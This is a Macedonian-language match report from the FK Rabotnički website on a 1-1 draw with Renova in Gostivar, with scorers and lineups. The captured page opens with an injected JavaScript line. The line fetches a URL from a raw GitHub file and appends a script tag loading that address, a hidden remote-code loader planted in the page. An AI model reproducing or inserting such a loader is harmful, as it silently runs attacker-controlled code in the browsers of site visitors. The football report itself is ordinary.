;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Реми (1-1) против Ренова на крајот од шампионатот
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Реми (1-1) против Ренова на крајот од шампионатот

Работнички ремизираше 1-1 против Ренова во Гостивар, во последното коло од Првата фудбалска лига. Нашиот тим го заокружува шампионатот на петтата позиција на табелата со 48 бода.

Ренова беше поактивна на почетокот на натпреварот и се закани преку Ален Јашароски, но без посериозен ефект за голот на Јанков. Потоа се обиде и Перез, но водечкиот гол за домаќинот го постигна Шефит Шефити во 28.минута од мечот.

Шефити имаше можност и за втор погодок, но Јанков одлично интервенираше и одбрани.

Во второто полувреме тренерот Александар Влахо направи неколку замени и тоа донесе резултат. Во 59.минута, по длабинската топка од Ристовски, нововлезениот Фахрудин Ѓурѓевиќ со прецизен удар од 15 метри успеа да го израмни резултатот.

РЕНОВА – РАБОТНИЧКИ 1-1 (1-0)

Стадион во Гостивар. Судија: Александар Ставрев. Стрелци: Шефити 28’ (Ренова), Ѓурѓевиќ 59’ (Работнички). Ж. картони: Ебиби (Ренова), Л. Станковски (Работнички)

РЕНОВА: Велии, Мишковски, Абдула, Тафа, Садики (62’ Гафури), Стојчевски, Алити (62’ Ебиби), Мухарем (86’ Емурли), Шефити, Перез (78’ Рамадани), Јашароски (78’ Селмани).

РАБОТНИЧКИ: Јанков, Ристески (69’ Хајдари), Кировски, Ѓорѓевиќ, Стојков (56’ Јевтоски), Максимов, Ристовски, Тодоровски, Стојкоски (56’ Ѓурѓевиќ), Л.Станковски, М.Станковски.